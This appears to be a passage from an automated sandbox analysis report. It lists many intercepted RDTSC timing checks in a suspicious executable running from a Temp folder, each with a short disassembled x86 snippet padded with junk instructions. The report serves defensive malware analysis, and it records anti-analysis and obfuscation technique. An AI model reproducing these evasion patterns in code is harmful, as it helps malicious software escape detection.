Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75AED1 second address: 75AF51 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB4246CBDE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FB4246CBDE8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov ebx, dword ptr [ebp+1248EF7Ch] 0x0000002e mov edi, 6A1DABC2h 0x00000033 add eax, ebx 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007FB4246CBDE8h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f mov dword ptr [ebp+12466288h], ebx 0x00000055 push eax 0x00000056 push edi 0x00000057 jne 00007FB4246CBDECh 0x0000005d pop edi 0x0000005e mov dword ptr [esp], eax 0x00000061 mov cx, bx 0x00000064 push 00000004h 0x00000066 mov ecx, dword ptr [ebp+122D1A83h] 0x0000006c mov cx, ax 0x0000006f push eax 0x00000070 push ebx 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75AF51 second address: 75AF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A7122 second address: 7A7130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB4246CBDE6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A7130 second address: 7A7148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB42454284Bh 0x00000009 jp 00007FB424542846h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A7148 second address: 7A714D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7ABAD7 second address: 7ABADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7ABADF second address: 7ABAEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7ABAEA second address: 7ABAEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7AAD52 second address: 7AAD69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7AAD69 second address: 7AAD83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB424542852h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7AAED4 second address: 7AAF0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF9h 0x00000007 jmp 00007FB4246CBDF6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jp 00007FB4246CBDE8h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7AB33D second address: 7AB353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB42454284Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7AB353 second address: 7AB358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7AB358 second address: 7AB39E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB424542852h 0x00000008 jbe 00007FB424542846h 0x0000000e pop esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FB424542858h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push ebx 0x0000001d jno 00007FB424542846h 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 pop ebx 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B36B8 second address: 7B36C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4246CBDEDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B196D second address: 7B1975 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B1975 second address: 7B19A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FB4246CBDF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b jne 00007FB4246CBDECh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B1ADE second address: 7B1AE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B1AE4 second address: 7B1AE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B1AE8 second address: 7B1AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B1C2A second address: 7B1C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B1F23 second address: 7B1F27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B2199 second address: 7B219D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B26E3 second address: 7B2702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 jmp 00007FB424542854h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B2702 second address: 7B270C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB4246CBDE6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B2BED second address: 7B2BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B2BF1 second address: 7B2BFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B89D6 second address: 7B89F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB42454284Fh 0x00000009 popad 0x0000000a jo 00007FB42454285Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B89F2 second address: 7B8A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4246CBDF0h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B8A06 second address: 7B8A20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB42454284Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB42454284Ah 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7B8A20 second address: 7B8A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7BA0BC second address: 7BA0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7BCE1E second address: 7BCE26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7BCE26 second address: 7BCE3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7BCE3C second address: 7BCE42 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7BD6A2 second address: 7BD6B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jns 00007FB42454284Ch 0x0000000b pop ecx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7BD6B9 second address: 7BD6BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7BD7F8 second address: 7BD82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FB424542859h 0x0000000b jmp 00007FB42454284Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007FB424542846h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7BD82C second address: 7BD83C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDECh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7BD9B6 second address: 7BD9DD instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB424542861h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C548D second address: 7C5491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C5491 second address: 7C54A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB42454284Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C3809 second address: 7C3836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jnl 00007FB4246CBDE6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FB4246CBDF9h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C3836 second address: 7C383A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C383A second address: 7C384A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jnp 00007FB4246CBE15h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C3CEE second address: 7C3CF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C3CF2 second address: 7C3CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C3CF8 second address: 7C3CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C3CFE second address: 7C3D14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4246CBDECh 0x00000009 jp 00007FB4246CBDE6h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C3E6B second address: 7C3E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C4535 second address: 7C453C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7C453C second address: 7C4542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7CC634 second address: 7CC657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB4246CBDF4h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7CC657 second address: 7CC663 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FB424542846h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7CC663 second address: 7CC669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7CC669 second address: 7CC66D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7D951F second address: 7D9523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7D9523 second address: 7D953B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB424542846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FB424542846h 0x00000012 jng 00007FB424542846h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7D953B second address: 7D9556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7D9556 second address: 7D955C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7D955C second address: 7D9585 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4246CBDF6h 0x00000009 jmp 00007FB4246CBDEFh 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7D911B second address: 7D911F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7D911F second address: 7D9128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7D927D second address: 7D9293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB424542852h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7D9293 second address: 7D9297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7D9297 second address: 7D929D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7E3E99 second address: 7E3EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jng 00007FB4246CBDECh 0x0000000b js 00007FB4246CBDE6h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7E53E6 second address: 7E53F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB42454284Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7E53F2 second address: 7E5404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007FB4246CBDE6h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7E5404 second address: 7E5429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542857h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d jng 00007FB424542846h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7E5429 second address: 7E542D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7EAC97 second address: 7EAC9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7EAC9D second address: 7EACBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4246CBDF0h 0x00000009 ja 00007FB4246CBDE6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7EACBC second address: 7EACC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB424542846h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7EACC6 second address: 7EACCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7EACCC second address: 7EACFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB424542859h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007FB424542846h 0x00000016 jns 00007FB424542846h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7EACFC second address: 7EAD02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F0951 second address: 7F095E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 jbe 00007FB424542846h 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F095E second address: 7F0965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F67EF second address: 7F6814 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB424542853h 0x0000000c jns 00007FB424542846h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F6AE8 second address: 7F6B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jc 00007FB4246CBE02h 0x0000000b jmp 00007FB4246CBDF2h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F6C61 second address: 7F6C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB424542852h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F6DE4 second address: 7F6DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB4246CBDE6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F6F4B second address: 7F6F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jp 00007FB424542848h 0x0000000b jne 00007FB424542848h 0x00000011 pushad 0x00000012 popad 0x00000013 jc 00007FB42454285Dh 0x00000019 jmp 00007FB424542851h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F6F79 second address: 7F6F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FB4246CBDEEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F6F88 second address: 7F6F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FB424542846h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F6F97 second address: 7F6F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F6F9F second address: 7F6FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
